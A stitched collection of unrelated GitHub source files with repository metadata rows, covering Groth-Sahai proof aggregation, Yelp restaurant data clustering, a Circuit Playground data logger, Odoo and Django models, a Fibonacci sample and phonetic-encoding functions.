    cm_sigt_i.append(auth.GS.Commit({"group":2, "type":"enc", "value":sigt_i[2]}))
    #t: used as public scalar constraint (gamma_ij)
    cm_pk_ui = auth.GS.Commit({"group":1, "type":"com", "value":pk_ui})
    cm_pk_uv = auth.GS.Commit({"group":1, "type":"pub", "value":pk_uv})
    cm_sku = auth.GS.Commit({"group":2, "type":"sca", "value":sku})
    cm_cipher = []
    for i in range(len(cipher)):
        cm_cipher.append(auth.GS.Commit({"group":1, "type":"pub", "value":cipher[i]}))
    cm_r = r
    cm_r[0] = auth.GS.Commit({"group":2, "type":"sca", "value":r[0]})
    cm_ek = []
    for i in range(len(ek)):
        cm_ek.append(auth.GS.Commit({"group":1, "type":"pub", "value":ek[i]}))
    cm_da = auth.GS.Commit({"group":1, "type":"pub", "value":auth.ek[1]*r[1]})
    cm_params_enc = []
    cm_params_enc.append(auth.GS.Commit({"group":1, "type":"pub", "value":auth.GS.v1[0]}))
    cm_params_enc.append(auth.GS.Commit({"group":1, "type":"pub", "value":auth.GS.v1[1]}))
    cm_g1 = auth.GS.Commit({"group":1, "type":"bas", "value":auth.GS.g1})
    cm_g2 = auth.GS.Commit({"group":2, "type":"bas", "value":auth.GS.g2})
    cm_1 = auth.GS.Commit({"group":2, "type":"unt", "value":1})
    #t_commit = time.time()
    #print("--- Commitment time:", t_commit - t_start)
    # x/y vectors for the pairing-product equations; positions must match
    # the hard-coded matrix indices in the proof_sig* helpers.
    x_ppe = [cm_g1]
    x_ppe.extend(cm_vkI[0])
    x_ppe.append(cm_h_i)
    x_ppe.extend([cm_sig0_i[0], cm_sig0_i[1]])
    x_ppe.extend([cm_sigt_i[0], cm_sigt_i[1]])
    x_ppe.extend(cm_sig_i)
    x_ppe.append(cm_pk_ui)
    x_ppe.extend(cm_m)
    #print("\nx_ppe", len(x_ppe), x_ppe)
    y_ppe = [cm_g2]
    y_ppe.append(cm_vkI[3])
    y_ppe.append(cm_vkI[2])
    y_ppe.extend(cm_vkI[1])
    y_ppe.append(cm_sig0_i[2])
    y_ppe.append(cm_sigt_i[2])
    y_ppe.extend(cm_vk_i)
    #print("\ny_ppe", len(y_ppe), y_ppe)
    # x/y vectors for the multi-exponent equations; positions must match
    # the indices used in proof_pkui/proof_pkuv/enc_proof.
    x_me1 = []
    x_me1.extend(cm_params_enc)
    x_me1.extend(cm_ek)
    x_me1.append(cm_h_v)
    x_me1.append(cm_pk_uv)
    x_me1.append(cm_h_i)
    x_me1.append(cm_pk_ui)
    x_me1.append(cm_da)
    x_me1.extend(cm_cipher)
    #print("\nx_me1", len(x_me1), x_me1)
    y_me1 = [cm_1, cm_sku, cm_r[0]]
    #print("\ny_me1", len(y_me1), y_me1)
    #print("Prepare proof: Prove")
    #t_prove = time.time()
    #print("--- sigi proof")
    cm_msg = [cm_pk_ui]
    cm_msg.extend(cm_m)
    for i in range(len(cm_vk_i) - 2 - len(cm_msg)):
        cm_msg.append(auth.GS.Commit({"group":1, "type":"pub", "value":G1Elem.inf(auth.GS.G)}))
    C_sigi, pi_sigi = proof_sigi(auth.GS, x_ppe, y_ppe, cm_msg)
    cm_msg1 = [cm_g1, cm_h_i]
    cm_msg2 = cm_vk_i
    #print("--- sigi0 proof")
    C_sigi0, pi_sigi0, _ = proof_sigi0(auth.GS, x_ppe, y_ppe, cm_msg1, cm_msg2, Bn(0))
    #print("--- sigit proof")
    C_sigit, pi_sigit, _ = proof_sigit(auth.GS, x_ppe, y_ppe, cm_msg1, cm_msg2, t)
    #print("--- Aggregate PPE proofs")
    # The individual proofs are already challenge-weighted, so plain sums
    # yield the aggregate matrix and proof elements.
    c_ppe = []
    for i in range(len(C_sigi)):
        row = []
        for j in range(len(C_sigi[i])):
            cij = C_sigi[i][j] + C_sigit[i][j] + C_sigi0[i][j]
            row.append(cij)
        c_ppe.append(row)
    pi_ppe = []
    for i in range(len(pi_sigi)):
        pi_i = []
        for j in range(len(pi_sigi[i])):
            pi_ij = pi_sigi[i][j] + pi_sigit[i][j] + pi_sigi0[i][j]
            pi_i.append(pi_ij)
        pi_ppe.append(pi_i)
    #print("--- Randomize PPE proof")
    pi_ppe[0], pi_ppe[1], pi_ppe[2], pi_ppe[3] = auth.GS.Randomize("PPE", pi_ppe[0], pi_ppe[1], pi_ppe[2], pi_ppe[3])
    res_ppe = [c_ppe, pi_ppe]
    #t_ppe = time.time()
    print("--- exponent proofs pk_ui")
    C_pkui, pi_pkui = proof_pkui(auth.GS, x_me1, y_me1)
    print("--- exponent proofs pk_uv")
    C_pkuv, pi_pkuv = proof_pkuv(auth.GS, x_me1, y_me1)
    #print("--- enc proof")
    C_enc, pi_enc, _ = enc_proof(auth.GS, x_me1, y_me1, r[1])
    #print("--- aggregate ME1 proofs")
    c_me1 = []
    for i in range(len(C_enc)):
        row = []
        for j in range(len(C_enc[i])):
            cij = C_enc[i][j] + C_pkui[i][j] + C_pkuv[i][j]
            row.append(cij)
        c_me1.append(row)
    pi_me1 = []
    for i in range(len(pi_enc)):
        pi_i = []
        for j in range(len(pi_enc[i])):
            pi_ij = pi_enc[i][j] + pi_pkui[i][j] + pi_pkuv[i][j]
            pi_i.append(pi_ij)
        pi_me1.append(pi_i)
    #print("------ Randomize ME1 proof")
    # NOTE(review): Randomize is invoked with equation type "PPE" although
    # this is the ME1 aggregate -- confirm this is intentional.
    pi_me1[0], pi_me1[1], pi_me1[2], pi_me1[3] = auth.GS.Randomize("PPE", pi_me1[0], pi_me1[1], pi_me1[2], pi_me1[3])
    res_me1 = [c_me1, pi_me1]
    #t_end = time.time()
    #print("--- Prove & aggregation time:", t_end - t_commit, "(PPE proof: "+ str(t_ppe-t_commit) +"+ ME1 proof"+ str(t_end-t_ppe) +")")
    verify_ppe = auth.GS.Verify(
        "PPE",
        x_ppe,
        y_ppe,
        c_ppe,
        pi_ppe[0],
        pi_ppe[1],
        pi_ppe[2],
        pi_ppe[3]
    )
    print("------ Aggregate PPE verify?", verify_ppe)
    verify_me1 = auth.GS.Verify(
        "ME1",
        x_me1,
        y_me1,
        c_me1,
        pi_me1[0],
        pi_me1[1],
        pi_me1[2],
        pi_me1[3]
    )
    print("------ Aggregate ME1 verify?", verify_me1)
    verify = verify_ppe*verify_me1
    res = [
        [res_ppe[1], ["PPE", x_ppe, y_ppe, res_ppe[0], GTElem.zero(auth.GS.G)]],
        [res_me1[1], ["ME1", x_me1, y_me1, res_me1[0], G1Elem.inf(auth.GS.G)]]
    ]
    #print("--- Do all the proofs verify?", verify_ppe*verify_me1)
    return verify, res
| [
"noreply@github.com"
] | rrtoledo.noreply@github.com |
81df6b3c741f03920272dfa9dffe1c83c5fd169c | 729bf7c8bc3ee1f073cb390af6d47f653a8f66f3 | /Hackyeah/__init__.py | 022965f1807b20e11b2e62aa3f11d7057d5d24f8 | [] | no_license | danieljurczak/skarbnik-hackathon | 6f5c626a15299906a65b12dd585af8f95a90bb9b | 9157888d85c0d22ed57f861898318719998e9e43 | refs/heads/master | 2022-12-17T04:43:17.303233 | 2019-03-09T12:16:24 | 2019-03-09T12:16:24 | 158,933,513 | 0 | 2 | null | 2022-05-25T01:57:23 | 2018-11-24T12:19:34 | Python | UTF-8 | Python | false | false | 51 | py | default_app_config = 'skarbnik.apps.SkarbnikConfig' | [
"danieljur4@gmail.com"
] | danieljur4@gmail.com |
52b71bf750e768350bf69f21d94a78ff9ca35090 | 8a8463765239e923f00676ad26d7071275d0f462 | /project.py | ff8f9d28cfaea91911a54653d8b5efe2b66ac4a9 | [] | no_license | aparnamogallapu/yelp | e711821a756d8ddb1b8ab62ac3ef51035d672279 | c280ae4c757129f3498f851798cc3e1e6c8461b2 | refs/heads/master | 2020-06-29T07:02:15.809389 | 2019-08-04T08:48:10 | 2019-08-04T08:48:10 | 200,470,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,028 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 17 12:48:17 2019
@author: HP
"""
# Exploratory analysis + k-means clustering of the Yelp business dataset:
# clean the data, keep USA restaurants, tag a cuisine category, plot EDA
# charts and cluster (review_count, stars).
import pandas as pd
import numpy as no
# NOTE(review): numpy is aliased as `no` (likely a typo for `np`) and never
# used below.
import matplotlib.pyplot as plt
dataset=pd.read_csv("C:\\Users\\HP\\Desktop\\YELP BUSINESS\\yelp_business.csv")
data=dataset.copy()
dataset.info()
dataset.describe()
dataset.isna().sum()
# Drop sparse columns, keeping copies of the dropped series.
neighborhood=dataset.neighborhood
dataset.drop(["neighborhood"],axis=1,inplace=True)
postal_code=dataset.postal_code
dataset.drop(["postal_code"],axis=1,inplace=True)
#df.drop(df.index[[1,3]], inplace=True)
# Drop the specific rows found to have null city/state (positions were
# identified interactively; the bare indexing expressions below only
# display, they do not modify).
dataset[dataset['city'].isnull()]
dataset.drop(dataset.index[146524],inplace=True)
dataset[dataset['state'].isnull()]
dataset.drop(dataset.index[52815],inplace=True)
dataset[dataset['latitude'].isnull()]
#dataset.drop(dataset.index[136097],inplace=True)
dataset[dataset['longitude'].isnull()]
#dataset.drop(dataset.index[136097],inplace=True)
#dataset.drop(dataset['city'].isna(),axis=0,inplace=True)
dataset.dropna(inplace=True)
# Strip punctuation/special characters from business names.
dataset['name']=dataset['name'].astype(str).transform(lambda x:x.replace('"',""))
dataset['name']=dataset['name'].astype(str).transform(lambda x:x.replace(',',""))
dataset['name']=dataset['name'].astype(str).transform(lambda x:x.replace("'",""))
dataset['name']=dataset['name'].astype(str).transform(lambda x:x.replace('%',""))
dataset['name']=dataset['name'].astype(str).transform(lambda x:x.replace('@',""))
#states
# Two-letter codes of the 50 US states, used to filter out non-US rows.
states=['AL','AK','AZ','AR','CA','CO','CT','DE','FL','GA','HI',
        'ID','IL','IN','IA','KS','KY','LA','ME','MD','MA','MI',
        'MN','MS','MO','MT','NE','NV','NH','NJ','NY','NM','NC',
        'ND','OH','OK','OR','PA','RI','SC','SD','TN','TX','UT',
        'VT','VA','WA','WV','WI','WY']
usa=dataset.loc[dataset['state'].isin(states)]
usa_restaurants = usa[usa['categories'].str.contains('Restaurants')]
usa_restaurants.categories.value_counts()
usa_restaurants.shape
#
usa_restaurants.is_copy=False
# Derive a single cuisine label from the free-form categories string; rows
# matching several cuisines keep the LAST match applied below.
usa_restaurants['category']=pd.Series()
usa_restaurants.loc[usa_restaurants.categories.str.contains('American'),'category']='American'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Mexican'),'category']='Mexican'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Chinese'),'category']='Chinese'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Italian'),'category']='Italian'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Thai'),'category']='Thai'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Japanese'),'category']='Japanese'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Meditteranean'),'category']='Meditteranean'
usa_restaurants.loc[usa_restaurants.categories.str.contains('French'),'category']='French'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Vietnamese'),'category']='Vietnamese'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Greek'),'category']='Greek'
usa_restaurants.loc[usa_restaurants.categories.str.contains('Indian'),'category']='Indian'
usa_restaurants.dropna(inplace=True)
usa_restaurants.columns
usa_restaurants.info()
#Eda
usa_restaurants.review_count.value_counts().sort_values(ascending=False)[0:50].plot.bar()
import seaborn as sns
sns.barplot(x='stars',y='category',data=usa_restaurants)
sns.countplot(x='stars',data=usa_restaurants,palette='viridis')
sns.distplot(usa_restaurants['review_count'])
sns.jointplot(x='review_count',y='category',data=usa_restaurants)
sns.barplot(x='category',y='stars',data=usa_restaurants)
sns.boxplot(x='state',y='stars',data=usa_restaurants)
sns.countplot(x='category',data=usa_restaurants)
plt.figure(figsize=(12,3))
sns.countplot(x='stars',data=usa_restaurants)
sns.barplot(x='latitude',y='category',data=usa_restaurants)
##pie chart
plt.axis('equal')
# NOTE(review): this pie call raises -- `redius` is not a valid keyword
# (should be `radius`), `labels` must be a sequence the same length as the
# data, and `explode` has only 5 entries; likely intended input is
# dataset['stars'].value_counts().
plt.pie(dataset.stars, labels='category',redius=1.5, shadow=True, explode=[0,0.1,0.1,0,0],
        startangle=180,autopct='%0.1f%%')
plt.show()
'''fig, ax = plt.subplots(1, 1, figsize=(10,10))
news_data['stars'].value_counts().plot.pie( autopct = '%1.1f%%')'''
'''
#pip install cufflinks
#pip install plotly
import plotly .plotly as py
from plotly.offline import download_plotlyjs,init_notebook_mode,plot,iplot
import plotly.graph_objs as go
data=dict(type='choropleth',
            locations=usa_restaurants['state'],
            z=usa_restaurants['stars'],
            text=['category'],
            colorbar={'title':'starts in Restaurants'})
layout=dict(title='starts in Restaurants',
            geo=dict(showframe=False,projection={'type':"stereographic"}))
choromap=go.Figure(data=[data],layout=layout)
iplot(choromap)'''
# Keep copies of the dropped city/state columns, then export the cleaned
# frame for later use.
city=usa_restaurants.city
usa_restaurants.drop(["city"],axis=1,inplace=True)
state=usa_restaurants.state
usa_restaurants.drop(["state"],axis=1,inplace=True)
import os
os.chdir('F:\\ds')
usa_restaurants.to_csv('restaurants.csv',index = False)
usa_restaurants['ind']=usa_restaurants.index
usa_restaurants.info()
# Feature matrix: columns 8 and 7 by position -- presumably
# (review_count, stars); verify against the cleaned column order.
X=usa_restaurants.iloc[:,[8,7]].values
#elbow method:
from sklearn.cluster import KMeans
wcss=[]
# Within-cluster sum of squares for k = 1..10 to pick k visually.
for i in range(1,11):
    kmeans=KMeans(n_clusters=i,init='k-means++',n_init=10,max_iter=300,random_state=0)
    kmeans.fit(X)
    wcss.append(kmeans.inertia_)
plt.plot(range(1,11),wcss)
plt.title('The Elbow Method')
plt.xlabel('The Number Of clusters')
plt.ylabel('wcss')
plt.show()
#fitting dataset
kmeans=KMeans(n_clusters=4,init='k-means++',random_state=0)
y_kmeans=kmeans.fit_predict(X)
plt.scatter(X[y_kmeans==0,0],X[y_kmeans==0,1],s=100,c='red',label='clusters1')
plt.scatter(X[y_kmeans==1,0],X[y_kmeans==1,1],s=100,c='blue',label='clusters2')
plt.scatter(X[y_kmeans==2,0],X[y_kmeans==2,1],s=100,c='green',label='clusters3')
plt.scatter(X[y_kmeans==3,0],X[y_kmeans==3,1],s=100,c='yellow',label='clusters4')
plt.scatter(kmeans.cluster_centers_[:,0],kmeans.cluster_centers_[:,1],s=300,c='pink',label='centroids')
plt.title('clusters of stars')
plt.xlabel('review_count')
plt.ylabel('stars')
plt.legend()
plt.show()
| [
"noreply@github.com"
] | aparnamogallapu.noreply@github.com |
a4214f2be262f9ef0f986aad6da8ab0278710bfd | 0575425c3412e38b157ea597c3727f2fe8f111fb | /product_container/models/product_template.py | 97c82cee079bdefc1fb3e810e09589e98b9058dd | [] | no_license | qrtl/crh-custom | b3b49a36c4c7a8fb4591574ccb9ef249c831b496 | e4e807801ff42326bae53963b6fe5caf0849b00c | refs/heads/12.0 | 2023-05-30T20:28:26.375883 | 2019-12-12T05:41:23 | 2020-01-15T09:36:08 | 212,749,332 | 0 | 1 | null | 2023-05-12T09:18:59 | 2019-10-04T06:24:41 | HTML | UTF-8 | Python | false | false | 360 | py | # Copyright 2019 Quartile Limited
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields
class ProductTemplate(models.Model):
_inherit = 'product.template'
container = fields.Selection([
('bottle', 'Bottle'),
('keg', 'Keg')
], help="The value will be used in liquor tax reporting.")
| [
"tashiro@quartile.co"
] | tashiro@quartile.co |
5b1b804ba412f88488a66775b1cd8af3b8f2a81e | 517d461257edd1d6b239200b931c6c001b99f6da | /Circuit_Playground/CircuitPython/Data_Logging/typing/typing_original_.py | 5b9aa66386ae0b84741b00930ee46fc0dee033a7 | [] | no_license | cmontalvo251/Microcontrollers | 7911e173badff93fc29e52fbdce287aab1314608 | 09ff976f2ee042b9182fb5a732978225561d151a | refs/heads/master | 2023-06-23T16:35:51.940859 | 2023-06-16T19:29:30 | 2023-06-16T19:29:30 | 229,314,291 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,283 | py | # Circuit Playground Express Data Time/Light Intensity/Temp
# Log data to a spreadsheet on-screen
# Open Spreadsheet beforehand and position to start (A,1)
# Use slide switch to start and stop sensor readings
# Time values are seconds since board powered on (relative time)
import time
from digitalio import DigitalInOut, Direction, Pull
import analogio
import board
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keycode import Keycode
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
import adafruit_thermistor
# Hardware setup: slide switch gates logging; the board acts as a USB HID
# keyboard and "types" each reading into the focused spreadsheet.
# Switch to quickly enable/disable
switch = DigitalInOut(board.SLIDE_SWITCH)
switch.pull = Pull.UP
# light level
light = analogio.AnalogIn(board.LIGHT)
# temperature
# Thermistor parameters: 10k series resistor, 10k nominal at 25 C, B=3950.
thermistor = adafruit_thermistor.Thermistor(board.TEMPERATURE, 10000,
                                            10000, 25, 3950)
# Set the keyboard object!
# Sleep for a bit to avoid a race condition on some systems
time.sleep(1)
kbd = Keyboard()
layout = KeyboardLayoutUS(kbd) # US is only current option...
led = DigitalInOut(board.D13) # Set up red LED "D13"
led.direction = Direction.OUTPUT
print("Time\tLight\tTemperature") # Print column headers
def slow_write(string): # Typing should not be too fast for
    for c in string: # the computer to be able to accept
        layout.write(c)
        time.sleep(0.2) # use 1/5 second pause between characters
while True:
    if switch.value: # If the slide switch is on, don't log
        continue
    # Turn on the LED to show we're logging
    led.value = True
    temp = thermistor.temperature # In Celsius
    # if you want Fahrenheit, uncomment the line below
    # temp = temp * 9 / 5 + 32
    # Format data into value 'output'
    output = "%0.1f\t%d\t%0.1f" % (time.monotonic(), light.value, temp)
    print(output) # Print to serial monitor
    slow_write(output) # Print to spreadsheet
    kbd.press(Keycode.DOWN_ARROW) # Code to go to next row
    time.sleep(0.01)
    kbd.release_all()
    # Return to column A: three left-arrows (tab-separated cells above
    # advanced the cursor three columns to the right).
    for _ in range(3):
        kbd.press(Keycode.LEFT_ARROW)
        time.sleep(0.015)
        kbd.release_all()
    time.sleep(0.025) # Wait a bit more for Google Sheets
    led.value = False
    # Change 0.1 to whatever time you need between readings
    time.sleep(0.1)
"cmontalvo251@gmail.com"
] | cmontalvo251@gmail.com |
64d2855cd04459ab7a7b86a9e703c6518a7c19f3 | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/not/sample_good666.py | 3687c9337e2f798525c72cf0779d606b08e582b2 | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | import random
import re
import array
import textwrap
import readline
nterms = 195
n1, n2 = 0, 1
if nterms <= 0:
print("Please provide a positive integer.")
elif nterms == 1:
print("Fibonacci sequence upto", nterms, ":")
print(n1)
else:
print("Fibonacci sequence:")
count = 0
while 0 < 195:
print(n1)
nth = n1 + n2
n1 = n2
n2 = nth
count = count - (2 - 3)
| [
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
eff1045a05c5f500f5639905ba8c923fe1ed7f46 | 9df5c483fc09843ca3be78ff68e40ba9dab8f830 | /setup.py | 67e73e0445d9194aceef825eea8fa446efa6367d | [
"Apache-2.0"
] | permissive | skytap/skytap-ansible-inventory | 968ff597f18290deb0a4102c519d6a9064ae04a0 | f01d5174bc4fd03c7f3e8e67a632012c4bfce534 | refs/heads/master | 2021-01-15T14:29:39.838948 | 2017-05-09T20:44:06 | 2017-07-31T00:39:54 | 43,448,039 | 4 | 3 | null | 2017-07-31T00:39:55 | 2015-09-30T17:33:08 | Python | UTF-8 | Python | false | false | 1,300 | py | from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='skytap-ansible-inventory',
version='0.1',
description='Skytap Ansible Inventory',
long_description=long_description,
url='https://github.com/skytap/skytap-ansible-inventory',
author='Joe Burchett',
author_email='jburchett@skytap.com',
license='Apache 2.0',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: System :: Systems Administration',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
keywords='skytap ansible inventory',
py_modules=["skytap_inventory"],
install_requires=['six', 'requests'],
entry_points={
'console_scripts': [
'skytap_inventory=skytap_inventory:main',
],
},
)
| [
"nidd@skytap.com"
] | nidd@skytap.com |
224fb207ca9a27c14f0294bc89fd4cb9259e4438 | 481acefc8660ee456383844f1731eaa2e6055b0f | /t_6.py | e543af8b0a4b042ad25fae65e8c59b85ae4efd4d | [] | no_license | eugenmorok/Tasks_of_Py | 5378f06062fb7a0ee4faa1ec41a8842f5d7a9a9f | ca79fd3283ce93cbabe5d180e0461dd7c1f67d3c | refs/heads/main | 2023-01-01T08:19:30.843425 | 2020-10-22T04:09:42 | 2020-10-22T04:09:42 | 306,219,265 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | import sys
x = sys.argv[1].strip().replace(",", "").split()
x.reverse()
x = " ".join(x)
print(x)
| [
"64523467+eugenmorok@users.noreply.github.com"
] | 64523467+eugenmorok@users.noreply.github.com |
6730aafef63549f62e2673d9ec48a2b98ce7cfcc | d044e88e622d9f4ca350aa4fd9d95d7ba2fae50b | /application/dataentry/migrations/0192_auto_20210722_1359.py | 7e1c663d3fec4392b13dc51e6c16f22fc0f16cee | [] | no_license | Tiny-Hands/tinyhands | 337d5845ab99861ae189de2b97b8b36203c33eef | 77aa0bdcbd6f2cbedc7eaa1fa4779bb559d88584 | refs/heads/develop | 2023-09-06T04:23:06.330489 | 2023-08-31T11:31:17 | 2023-08-31T11:31:17 | 24,202,150 | 7 | 3 | null | 2023-08-31T11:31:18 | 2014-09-18T19:35:02 | PLpgSQL | UTF-8 | Python | false | false | 497 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2021-07-22 13:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Widen StationStatistics.budget to a nullable Decimal(17, 2)."""

    # Must be applied after migration 0191 of the dataentry app.
    dependencies = [
        ('dataentry', '0191_auto_20210712_1433'),
    ]

    operations = [
        migrations.AlterField(
            model_name='stationstatistics',
            name='budget',
            field=models.DecimalField(decimal_places=2, max_digits=17, null=True),
        ),
    ]
| [
"scrishel@sbcglobal.net"
] | scrishel@sbcglobal.net |
72a02d4058f097330d8a686d847ee822cf924629 | 2007f537558467326feef6736475d29a1b7ad08c | /flask_project02/testPy/testMain.py | 504901db9096b698231c0b32da81a5c07f4dc649 | [] | no_license | tiakoe/Data_Visualization_System | 1c9512b0874b35ff62513fde29cd345ff4fbb0ee | c9996276d8546c9917eeefac6dcb43540f731b41 | refs/heads/master | 2020-05-05T13:14:50.075485 | 2019-04-08T06:10:50 | 2019-04-08T06:10:50 | 180,068,440 | 1 | 1 | null | 2019-04-08T06:06:36 | 2019-04-08T04:16:14 | JavaScript | UTF-8 | Python | false | false | 1,108 | py | import pymysql
import operator
import time
import calendar
from interval import Interval, IntervalSet
from datetime import datetime, timedelta
import json
from intervals import DateTimeInterval
# Scratch/test script: opens a local MySQL connection, then experiments with
# dict aliasing.  Most of the data-querying code is commented out.
# NOTE(review): credentials are hard-coded ('root'/'XX') -- move to config or
# environment variables before any real use.
db = pymysql.connect(user='root', db='mydb3', port=3306, passwd='XX', host='127.0.0.1', charset='utf8')
cursor = db.cursor()
#
# sql = 'SELECT AREAID FROM hydata_swjl_all'
# cursor.execute(sql)
# temp = {}
# all_provin_id=[]
# for i in cursor.fetchall():
#     t = str(i[0][0:2])
#     if not temp.get(t):
#         temp.setdefault(t, 1)
#         all_provin_id.append(t)
#     temp[t] += 1
# # arr = []
# # for i in temp.values():
# #     arr.append(i)
# # arr.sort()
# print('all_province',all_provin_id)
# res=sorted(temp.items(),key=operator.itemgetter(1),reverse=True)
# arr=[]
# for i in res:
#     arr.append(str(i[0]))
# print(arr)
#
obj = {
    'fdf': 'fds',
    'asd': {'fd': 432,
            'xx': {'fd':'fds'}
            },
    'er':'fs'
}
# NOTE(review): this is an alias, not a copy -- mutating `ac` would mutate
# `obj` as well.
ac = obj
# ac['fd'] = 10
print(ac)
# fd=obj.get('asd')
# fd['fd']=43
# print(obj['asd'])
# # print(obj.items())
# for i in obj.items():
#     print(list(i))
| [
"1457925832@qq.com"
] | 1457925832@qq.com |
fe1d8101b5ee617594d53d6177bf3575250263c7 | 45ab485b3e24a86a62f7c3b5654ae799433a88a2 | /lab9/lab9.py | 84473fe1cec900fa393c1fc9d05648efa0a7e3b1 | [] | no_license | elizabethsiegle/cs330_labs | 7fbe23d46ce890f8337e476d288dcd3e64a702bb | b63dae00e6d144961acd9f6c923859fb53017f8d | refs/heads/master | 2021-01-19T17:16:41.278988 | 2017-04-14T15:29:16 | 2017-04-14T15:29:16 | 82,430,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,836 | py | import urllib
import urllib.request
import requests
import re
PhoneticAna = {}
def soundexNaive(name, len=4):
    """Simplified Soundex: keep the first letter, then append each later
    letter's digit group, skipping a digit equal to the one just emitted.

    Expects an upper-case A-Z string.  Unlike full Soundex, vowels (and
    H/W/Y) are simply ignored and do NOT separate identical codes.
    The result is padded with '0' and truncated to ``len`` characters.
    (The parameter name ``len`` shadows the builtin but is kept for
    interface compatibility.)
    """
    # Letter -> Soundex digit lookup, built from the digit groups.
    code_for = {
        letter: digit
        for digit, letters in (
            ("1", "BFPV"),
            ("2", "CGJKQSXZ"),
            ("3", "DT"),
            ("4", "L"),
            ("5", "MN"),
            ("6", "R"),
        )
        for letter in letters
    }
    sndx = name[0]  # the first letter is always kept verbatim
    for ch in name[1:]:
        digit = code_for.get(ch, "")
        # Appending "" is a no-op, matching the original behaviour where
        # unmapped letters neither emit nor reset the previous digit.
        if digit != sndx[-1]:
            sndx += digit
    return (sndx + (len * '0'))[:len]
def soundex(name, len = 4):
    """Table-driven Soundex code of an upper-case A-Z string.

    The first letter is kept verbatim; each later letter maps through a
    26-entry digit table ('0' marks letters that are dropped).  A digit is
    emitted only if it is non-zero and differs from the last character of
    the code so far.  The result is padded with '0' and truncated to
    ``len`` characters.  (``len`` shadows the builtin but is kept for
    interface compatibility.)
    """
    # Digit for each letter A..Z, indexed by alphabet position.
    table = '01230120022455012623010202'
    sndx = name[0]
    for ch in name[1:]:
        digit = table[ord(ch) - 65]  # 65 == ord('A')
        # Drop vowels/H/W ('0') and immediate repeats of the last code.
        if digit not in ('0', sndx[-1]):
            sndx += digit
    # Kept from the original: strip any '0's before padding (defensive --
    # none can actually be present at this point).
    sndx = sndx.replace('0', "")
    return (sndx + len * '0')[:len]
def metaphone(name):
    """Return the Metaphone phonetic key of *name*.

    Normalises the input to lower-case ASCII letters, then applies an
    ordered list of regex rewrite rules.  Replacements are UPPER-case, so
    already-rewritten text is never matched by later lower-case patterns.
    ('0' in the output represents the 'th' sound.)
    """
    RULES = [
    # Regexp, replacement
        [ r'([bcdfhjklmnpqrstvwxyz])\1+',r'\1' ],# Remove doubled consonants except g.
        [ '^ae', 'E' ], # ae -> E
        [ '^[gkp]n', 'N' ], # initial kn-, gn-, pn- -> N
        [ '^wr', 'R' ], # initial wr- -> R
        [ '^x', 'S' ], # x- -> S
        [ '^wh', 'W' ], # initial wh- -> W
        [ 'mb$', 'M' ], # -mb (as in dumb) -> M
        [ '(?!^)sch', 'SK' ], # sch -> SK
        [ 'th', '0' ], # 0 represents the th sound
        [ 't?ch|sh', 'X' ], # tch, tsh, ch, sh -> X
        [ 'c(?=ia)', 'X' ], # cia -> X
        [ '[st](?=i[ao])', 'X' ], # stia, stio -> X
        [ 's?c(?=[iey])', 'S' ], # ci, ce, cy, sci, sce, scy -> S
        [ '[cq]', 'K' ], # c, q -> K
        [ 'dg(?=[iey])', 'J' ], # dgi, dge, dgy -> J (as in ledger, edgy)
        [ 'd', 'T' ], # d -> T
        [ 'g(?=h[^aeiou])', '' ], # gh -> silent (gh- not at end or before vowel)
        [ 'gn(ed)?', 'N' ], # gne, gnd -> N
        [ '([^g]|^)g(?=[iey])',r'\1J' ], # gi, ge, gy, but not gg -> J
        [ 'g+', 'K' ], # g, gg -> K (as in egg)
        [ 'ph', 'F' ], # ph -> F
        [ r'([aeiou])h(?=\b|[^aeiou])',r'\1' ], # silent h if after vowel and no following vowels
        [ '[wy](?![aeiou])', '' ], # wy is silent if not followed by vowel
        [ 'z', 'S' ], # z -> S
        [ 'v', 'F' ], # v -> F
        [ '(?!^)[aeiou]+', '' ], # vowels silent unless first letter
    ]
    # Normalise case and remove non-ASCII
    name = name.lower()
    s = re.sub('[^a-z]', '', name)
    # Apply the Metaphone rules
    for (rx, rep) in RULES:
        s = re.sub(rx, rep, s)
    return s.upper()
def task13():
    """Interactively read a name from stdin and print its soundexNaive,
    soundex and metaphone encodings (the first two expect upper case)."""
    user_in = input('Input name: ')
    print("soundexNaive: ", soundexNaive(user_in.upper()))
    print("soundex: ", soundex(user_in.upper()))
    print("metaphone: ", metaphone(user_in))
#req = urllib2.Request('http://cs.brynmawr.edu/Courses/cs330/spring2017/soundex.txt')
#response = urllib2.urlopen(req)
#data = response.read()
def task4():
    """Download a list of female names and group them into the module-level
